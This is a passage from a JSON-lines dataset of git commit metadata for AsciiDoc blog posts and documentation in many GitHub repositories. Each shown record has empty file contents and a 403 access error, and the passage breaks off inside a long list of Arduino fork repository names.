2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ec8ff8c19fbb7f3b271ab89bda0141d43c8f6a5","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1539fd665c1d3c7b8040167bf633d108dc865139","subject":"Update 2016-11-15-231000-Thursday.adoc","message":"Update 2016-11-15-231000-Thursday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-15-231000-Thursday.adoc","new_file":"_posts\/2016-11-15-231000-Thursday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b26f66409c5fdc89c0c1c47762f4eae26287777","subject":"Analysis Print-exec","message":"Analysis Print-exec\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Ex\u00e9cution\/Print exec.adoc","new_file":"Ex\u00e9cution\/Print exec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5612f09671078613b1ba8139eb1e06a4ea0f7f3b","subject":"Update 2018-2-2-Web-R-T-C.adoc","message":"Update 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8aaeaa86ef7290d0d1efee733faf09dcd612440e","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5886dd7b0ec022442ed6f56dd4cc561a5a94f858","subject":"Update 2018-02-27-A-Few-Farewells.adoc","message":"Update 2018-02-27-A-Few-Farewells.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2018-02-27-A-Few-Farewells.adoc","new_file":"_posts\/2018-02-27-A-Few-Farewells.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"605f30eb512403eceade156a067efb36ab1b2775","subject":"fix typos","message":"fix typos","repos":"bjartek\/vertx-rx,bjartek\/vertx-rx","old_file":"rx-java\/src\/main\/asciidoc\/java\/index.adoc","new_file":"rx-java\/src\/main\/asciidoc\/java\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/vertx-rx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67f441237ac1a31f7cc121b1d02558d8b8ab7da5","subject":"Update 2016-01-13-Testing-html-insert.adoc","message":"Update 2016-01-13-Testing-html-insert.adoc","repos":"danen-carlson\/blog,danen-carlson\/blog,danen-carlson\/blog","old_file":"_posts\/2016-01-13-Testing-html-insert.adoc","new_file":"_posts\/2016-01-13-Testing-html-insert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danen-carlson\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a2947e6034bdcca52847d01497d446e68883e16","subject":"Update 2016-09-20-Java-One-2016-Day-0.adoc","message":"Update 2016-09-20-Java-One-2016-Day-0.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2016-09-20-Java-One-2016-Day-0.adoc","new_file":"_posts\/2016-09-20-Java-One-2016-Day-0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e198aa5e94504ef06e27aeb93a8fb441476d4501","subject":"v0.7.5 docs update","message":"v0.7.5 docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4aafe8d114c67cf8fd7321a27746fd21ca1e43d8","subject":"Update 2015-09-21-Aceess-Control.adoc","message":"Update 2015-09-21-Aceess-Control.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_file":"_posts\/2015-09-21-Aceess-Control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ac5510e37ef5015acefc4e6ab1bb1b0ba434b69","subject":"Update 2016-08-12-Why-Using-Framework.adoc","message":"Update 2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da2b7f5ee1bcce4cd4ea9cbb17526034b5cbe370","subject":"Update 2016-05-21-New-Dawn.adoc","message":"Update 2016-05-21-New-Dawn.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-21-New-Dawn.adoc","new_file":"_posts\/2016-05-21-New-Dawn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c1267979d8cd726ae8a040b0e8658cd356711db","subject":"Update 2016-12-25-My-title.adoc","message":"Update 2016-12-25-My-title.adoc","repos":"djmdata\/djmdata.github.io,djmdata\/djmdata.github.io,djmdata\/djmdata.github.io,djmdata\/djmdata.github.io","old_file":"_posts\/2016-12-25-My-title.adoc","new_file":"_posts\/2016-12-25-My-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djmdata\/djmdata.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aab9e1ab0b8ecbf67c9ba59da9c23cb3e4e28b02","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f5806e556af104b4e6b23b79485ee539dc14ec5","subject":"Add include.adoc","message":"Add include.adoc\n","repos":"wilhelmmatilainen\/atom-asciidoc-preview,Mogztter\/atom-asciidoc-preview,ldez\/atom-asciidoc-preview,asciidoctor\/atom-asciidoc-preview","old_file":"include.adoc","new_file":"include.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/atom-asciidoc-preview.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a11b92185df50547808ca0d5e7b2a17bec4f508f","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd379a0292eca06ba3d5e3fa99217d6327872bcc","subject":"Update 2016-12-11-My-first-post.adoc","message":"Update 2016-12-11-My-first-post.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-12-11-My-first-post.adoc","new_file":"_posts\/2016-12-11-My-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c671b7a47068f3ef18d713cf4fb8a4867c5216f7","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a97c08f5d9ee26549a44b3bb732e1ed6532a79e1","subject":"Update 2017-02-06-lvm.adoc","message":"Update 2017-02-06-lvm.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2017-02-06-lvm.adoc","new_file":"_posts\/2017-02-06-lvm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a63878fb31e24444c43d1d0e4e8f0da40fbaf9c4","subject":"fixed java docs example","message":"fixed java docs example\n","repos":"bjartek\/vertx-rx,bjartek\/vertx-rx","old_file":"rx-java\/src\/main\/asciidoc\/java\/index.adoc","new_file":"rx-java\/src\/main\/asciidoc\/java\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/vertx-rx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11e77024b352e3b1619fd2298e713f85d82f896d","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ff1bd1b61eacc6fe8439ee92539846e96627c10","subject":"Removed outdated examples and keep the link to the website doc","message":"Removed outdated examples and keep the link to the website doc\n","repos":"jotak\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,mwringe\/hawkular-metrics,jotak\/hawkular-metrics,burmanm\/hawkular-metrics,tsegismont\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,tsegismont\/hawkular-metrics,pilhuhn\/rhq-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,ppalaga\/hawkular-metrics,mwringe\/hawkular-metrics,ppalaga\/hawkular-metrics,ppalaga\/hawkular-metrics,hawkular\/hawkular-metrics,hawkular\/hawkular-metrics,jotak\/hawkular-metrics,pilhuhn\/rhq-metrics","old_file":"api\/metrics-api-jaxrs\/README.adoc","new_file":"api\/metrics-api-jaxrs\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"03d4c7b412899293ad802b57d97812b862ff074e","subject":"add faq guide","message":"add faq guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/faq.adoc","new_file":"content\/guides\/faq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ffa6bd6ef5e48ffe0580c18b072c3cd5997bcc58","subject":"Update 2020-01-31-nurse.adoc","message":"Update 2020-01-31-nurse.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-01-31-nurse.adoc","new_file":"_posts\/2020-01-31-nurse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df93c189e517f90f87f174f432eac398d4384517","subject":"PLANNER-457 SolverFactory.cloneSolverFactory() so configuring getSolverConfig() dynamically per parallel request doesn't require parsing the solver config XML each time","message":"PLANNER-457 SolverFactory.cloneSolverFactory() so configuring getSolverConfig() dynamically per parallel request doesn't require parsing the solver config XML each time\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.4.adoc","new_file":"download\/releaseNotes\/releaseNotes6.4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"494f5bd66d711512766b58616b8ce164918bab5f","subject":"Update 2010-11-03-Authentification-LDAP-avec-Play-framework.adoc","message":"Update 2010-11-03-Authentification-LDAP-avec-Play-framework.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-11-03-Authentification-LDAP-avec-Play-framework.adoc","new_file":"_posts\/2010-11-03-Authentification-LDAP-avec-Play-framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26ac897598fe04b1bfc2183c9ec259e9f64048c7","subject":"Fix indentation in the manpage","message":"Fix indentation in the manpage\n","repos":"kidswong999\/Arduino,plaintea\/esp8266-Arduino,leftbrainstrain\/Arduino-ESP8266,henningpohl\/Arduino,ssvs111\/Arduino,ntruchsess\/Arduino-1,ikbelkirasan\/Arduino,lukeWal\/Arduino,pdNor\/Arduino,ogferreiro\/Arduino,stickbreaker\/Arduino,stevemarple\/Arduino-org,danielchalef\/Arduino,wayoda\/Arduino,steamboating\/Arduino,chaveiro\/Arduino,gberl001\/Arduino,SmartArduino\/Arduino-1,mangelajo\/Arduino,adafruit\/ESP8266-Arduino,wdoganowski\/Arduino,gonium\/Arduino,gurbrinder\/Arduino,PaoloP74\/Arduino,benwolfe\/esp8266-Arduino,ari-analytics\/Arduino,acosinwork\/Arduino,Cloudino\/Arduino,SmartArduino\/Arduino-1,jmgonzalez00449\/Arduino,eddyst\/Arduino-SourceCode,andrealmeidadomingues\/Arduino,smily77\/Arduino,garci66\/Arduino,eggfly\/arduino,jaehong\/Xmegaduino,ricklon\/Arduino,mattvenn\/Arduino,jaehong\/Xmegaduino,ektor5\/Arduino,smily77\/Arduino,byran\/Arduino,wayoda\/Arduino,KlaasDeNys\/Arduino,eddyst\/Arduino-SourceCode,ntruchsess\/Arduino-1,radut\/Arduino,superboonie\/Arduino,paulmand3l\/Arduino,ForestNymph\/Arduino_sources,jamesrob4\/Arduino,vbextreme\/Arduino,plinioseniore\/Arduino,henningpohl\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,kidswong999\/Arduino,mangelajo\/Arduino,bigjosh\/Arduino,cscenter\/Arduino,EmuxEvans\/Arduino,PaoloP74\/Arduino,vbextreme\/Arduino,ashwin713\/Arduino,Cloudino\/Cloudino-Arduino-IDE,tomkrus007\/Arduino,niggor\/Arduino_cc,kidswong999\/Arduino,PaoloP74\/Arduino,benwolfe\/esp8266-Arduino,ektor5\/Arduino,mboufos\/esp8266-Arduino,PeterVH\/Arduino,toddtreece\/esp8266-Arduino,pdNor\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,eeijcea\/Arduino-1,rcook\/DesignLab,ogferreiro\/Arduino,scdls\/Arduino,Chris--A\/Arduino,OpenDevice\/Arduino,onovy\/Arduino,mattvenn\/Arduino,xxxajk\/Arduino-1,radut\/Arduino,ForestNymph\/Arduino_sources,Cloudino\/Cloudino-Arduino-IDE,gurbrinder\/Arduino,ntruchsess\/Arduino-1,KlaasDeNys\/Arduino,shannonshsu\/Arduino,jabezGit\/Arduino,niggor\/Arduino_cc,me-no-dev\/Arduino-1,superboonie\/Arduino,probonopd\/Arduino,snargledorf\/Arduino,Chris--A\/Arduino,leftbrainstrain\/Arduino-ESP8266,superboonie\/Arduino,tbowmo\/Arduino,tbowmo\/Arduino,EmuxEvans\/Arduino,weera00\/Arduino,plinioseniore\/Arduino,stevemarple\/Arduino-org,ThoughtWorksIoTGurgaon\/Arduino,stevemarple\/Arduino-org,wilhelmryan\/Arduino,rcook\/DesignLab,drpjk\/Arduino,ektor5\/Arduino,onovy\/Arduino,eduardocasarin\/Arduino,vbextreme\/Arduino,superboonie\/Arduino,lulufei\/Arduino,wilhelmryan\/Arduino,arduino-org\/Arduino,aichi\/Arduino-2,eddyst\/Arduino-SourceCode,stickbreaker\/Arduino,zaiexx\/Arduino,Chris--A\/Arduino,ntruchsess\/Arduino-1,Chris--A\/Arduino,UDOOboard\/Arduino,ikbelkirasan\/Arduino,PaoloP74\/Arduino,ccoenen\/Arduino,mboufos\/esp8266-Arduino,noahchense\/Arduino-1,ccoenen\/Arduino,paulo-raca\/ESP8266-Arduino,wayoda\/Arduino,wayoda\/Arduino,mboufos\/esp8266-Arduino,shiitakeo\/Arduino,nandojve\/Arduino,adamkh\/Arduino,jaehong\/Xmegaduino,NicoHood\/Arduino,henningpohl\/Arduino,shannonshsu\/Arduino,Chris--A\/Arduino,eeijcea\/Arduino-1,tskurauskas\/Arduino,radut\/Arduino,mattvenn\/Arduino,KlaasDeNys\/Arduino,Cloudino\/Cloudino-Arduino-IDE,PaoloP74\/Arduino,Alfredynho\/AgroSis,eddyst\/Arduino-SourceCode,ektor5\/Arduino,shiitakeo\/Arduino,ricklon\/Arduino,fungxu\/Arduino,arunkuttiyara\/Arduino,shiitakeo\/Arduino,niggor\/Arduino_cc,ektor5\/Arduino,mateuszdw\/Arduino,OpenDevice\/Arduino,lulufei\/Arduino,nkolban\/Arduino,ikbelkirasan\/Arduino,aichi\/Arduino-2,Alfredynho\/AgroSis,Protoneer\/Arduino,chaveiro\/Arduino,raimohanska\/Arduino,NaSymbol\/Arduino,paulmand3l\/Arduino,byran\/Arduino,danielchalef\/Arduino,scdls\/Arduino,jaimemaretoli\/Arduino,raimohanska\/Arduino,stevemayhew\/Arduino,paulmand3l\/Arduino,eeijcea\/Arduino-1,piersoft\/esp8266-Arduino,smily77\/Arduino,noahchense\/Arduino-1,gberl001\/Arduino,xxxajk\/Arduino-1,danielchalef\/Arduino,ssvs111\/Arduino,arduino-org\/Arduino,tommyli2014\/Arduino,paulo-raca\/ESP8266-Arduino,plinioseniore\/Arduino,koltegirish\/Arduino,adafruit\/ESP8266-Arduino,vbextreme\/Arduino,adafruit\/ESP8266-Arduino,adamkh\/Arduino,piersoft\/esp8266-Arduino,ssvs111\/Arduino,cscenter\/Arduino,xxxajk\/Arduino-1,NaSymbol\/Arduino,chaveiro\/Arduino,garci66\/Arduino,smily77\/Arduino,raimohanska\/Arduino,jmgonzalez00449\/Arduino,majenkotech\/Arduino,SmartArduino\/Arduino-1,Cloudino\/Arduino,ccoenen\/Arduino,fungxu\/Arduino,aichi\/Arduino-2,mateuszdw\/Arduino,eddyst\/Arduino-SourceCode,paulo-raca\/ESP8266-Arduino,eeijcea\/Arduino-1,wilhelmryan\/Arduino,steamboating\/Arduino,niggor\/Arduino_cc,tommyli2014\/Arduino,myrtleTree33\/Arduino,Gourav2906\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,jomolinare\/Arduino,stickbreaker\/Arduino,bigjosh\/Arduino,plinioseniore\/Arduino,NeuralSpaz\/Arduino,drpjk\/Arduino,cscenter\/Arduino,ikbelkirasan\/Arduino,HCastano\/Arduino,pdNor\/Arduino,lulufei\/Arduino,gurbrinder\/Arduino,ssvs111\/Arduino,kidswong999\/Arduino,adafruit\/ESP8266-Arduino,jabezGit\/Arduino,jaej-dev\/Arduino,onovy\/Arduino,tommyli2014\/Arduino,mangelajo\/Arduino,mateuszdw\/Arduino,kidswong999\/Arduino,nkolban\/Arduino,ntruchsess\/Arduino-1,ricklon\/Arduino,jaimemaretoli\/Arduino,sanyaade-iot\/Arduino-1,pdNor\/Arduino,sanyaade-iot\/Arduino-1,Gourav2906\/Arduino,bigjosh\/Arduino,stevemayhew\/Arduino,eduardocasarin\/Arduino,pdNor\/Arduino,tannewt\/Arduino,mc-hamster\/esp8266-Arduino,radut\/Arduino,ssvs111\/Arduino,zaiexx\/Arduino,adamkh\/Arduino,henningpohl\/Arduino,onovy\/Arduino,damellis\/Arduino,ForestNymph\/Arduino_sources,drpjk\/Arduino,EmuxEvans\/Arduino,jaehong\/Xmegaduino,NaSymbol\/Arduino,jamesrob4\/Arduino,xxxajk\/Arduino-1,HCastano\/Arduino,jabezGit\/Arduino,gurbrinder\/Arduino,danielchalef\/Arduino,stevemayhew\/Arduino,tomkrus007\/Arduino,lukeWal\/Arduino,jamesrob4\/Arduino,arunkuttiyara\/Arduino,plinioseniore\/Arduino,smily77\/Arduino,mboufos\/esp8266-Arduino,EmuxEvans\/Arduino,karlitxo\/Arduino,mateuszdw\/Arduino,superboonie\/Arduino,gestrem\/Arduino,laylthe\/Arduino,KlaasDeNys\/Arduino,lukeWal\/Arduino,Chris--A\/Arduino,karlitxo\/Arduino,bsmr-arduino\/Arduino,aichi\/Arduino-2,byran\/Arduino,gberl001\/Arduino,eduardocasarin\/Arduino,shannonshsu\/Arduino,jmgonzalez00449\/Arduino,mateuszdw\/Arduino,lulufei\/Arduino,tskurauskas\/Arduino,adafruit\/ESP8266-Arduino,NeuralSpaz\/Arduino,eggfly\/arduino,danielchalef\/Arduino,talhaburak\/Arduino,paulo-raca\/ESP8266-Arduino,paulmand3l\/Arduino,zederson\/Arduino,Gourav2906\/Arduino,sanyaade-iot\/Arduino-1,tbowmo\/Arduino,HCastano\/Arduino,ricklon\/Arduino,nandojve\/Arduino,plinioseniore\/Arduino,drpjk\/Arduino,nkolban\/Arduino,zenmanenergy\/Arduino,me-no-dev\/Arduino-1,ashwin713\/Arduino,arduino-org\/Arduino,laylthe\/Arduino,gestrem\/Arduino,probonopd\/Arduino,rcook\/DesignLab,UDOOboard\/Arduino,ari-analytics\/Arduino,stevemayhew\/Arduino,arunkuttiyara\/Arduino,mc-hamster\/esp8266-Arduino,ogahara\/Arduino,cscenter\/Arduino,eduardocasarin\/Arduino,tannewt\/Arduino,acosinwork\/Arduino,zaiexx\/Arduino,fungxu\/Arduino,lulufei\/Arduino,wayoda\/Arduino,niggor\/Arduino_cc,jomolinare\/Arduino,niggor\/Arduino_cc,nkolban\/Arduino,ektor5\/Arduino,NeuralSpaz\/Arduino,spapadim\/Arduino,leftbrainstrain\/Arduino-ESP8266,wilhelmryan\/Arduino,tbowmo\/Arduino,superboonie\/Arduino,fungxu\/Arduino,andrealmeidadomingues\/Arduino,ccoenen\/Arduino,Gourav2906\/Arduino,mattvenn\/Arduino,garci66\/Arduino,ccoenen\/Arduino,Cloudino\/Arduino,rcook\/DesignLab,NicoHood\/Arduino,wilhelmryan\/Arduino,jabezGit\/Arduino,smily77\/Arduino,me-no-dev\/Arduino-1,ikbelkirasan\/Arduino,piersoft\/esp8266-Arduino,probonopd\/Arduino,ari-analytics\/Arduino,spapadim\/Arduino,ogferreiro\/Arduino,me-no-dev\/Arduino-1,andrealmeidadomingues\/Arduino,koltegirish\/Arduino,ashwin713\/Arduino,ogferreiro\/Arduino,zaiexx\/Arduino,henningpohl\/Arduino,NicoHood\/Arduino,steamboating\/Arduino,damellis\/Arduino,majenkotech\/Arduino,shiitakeo\/Arduino,gberl001\/Arduino,eggfly\/arduino,adamkh\/Arduino,majenkotech\/Arduino,acosinwork\/Arduino,pdNor\/Arduino,majenkotech\/Arduino,snargledorf\/Arduino,wayoda\/Arduino,adamkh\/Arduino,wilhelmryan\/Arduino,raimohanska\/Arduino,Alfredynho\/AgroSis,gonium\/Arduino,ssvs111\/Arduino,arduino-org\/Arduino,stevemayhew\/Arduino,jmgonzalez00449\/Arduino,plinioseniore\/Arduino,OpenDevice\/Arduino,me-no-dev\/Arduino-1,andyvand\/Arduino-1,PeterVH\/Arduino,ccoenen\/Arduino,xxxajk\/Arduino-1,Alfredynho\/AgroSis,EmuxEvans\/Arduino,tannewt\/Arduino,arduino-org\/Arduino,jamesrob4\/Arduino,jaehong\/Xmegaduino,ashwin713\/Arduino,steamboating\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,laylthe\/Arduino,cscenter\/Arduino,ogahara\/Arduino,gonium\/Arduino,andrealmeidadomingues\/Arduino,Gourav2906\/Arduino,mc-hamster\/esp8266-Arduino,noahchense\/Arduino-1,toddtreece\/esp8266-Arduino,gonium\/Arduino,gonium\/Arduino,eduardocasarin\/Arduino,henningpohl\/Arduino,adafruit\/ESP8266-Arduino,zederson\/Arduino,xxxajk\/Arduino-1,superboonie\/Arduino,benwolfe\/esp8266-Arduino,ccoenen\/Arduino,SmartArduino\/Arduino-1,arduino-org\/Arduino,damellis\/Arduino,danielchalef\/Arduino,Cloudino\/Cloudino-Arduino-IDE,HCastano\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,ari-analytics\/Arduino,gurbrinder\/Arduino,probonopd\/Arduino,Cloudino\/Arduino,ForestNymph\/Arduino_sources,OpenDevice\/Arduino,jomolinare\/Arduino,jomolinare\/Arduino,bsmr-arduino\/Arduino,talhaburak\/Arduino,myrtleTree33\/Arduino,Protoneer\/Arduino,tskurauskas\/Arduino,paulo-raca\/ESP8266-Arduino,steamboating\/Arduino,Cloudino\/Arduino,ashwin713\/Arduino,weera00\/Arduino,jomolinare\/Arduino,pdNor\/Arduino,koltegirish\/Arduino,majenkotech\/Arduino,NaSymbol\/Arduino,Chris--A\/Arduino,piersoft\/esp8266-Arduino,talhaburak\/Arduino,Protoneer\/Arduino,Protoneer\/A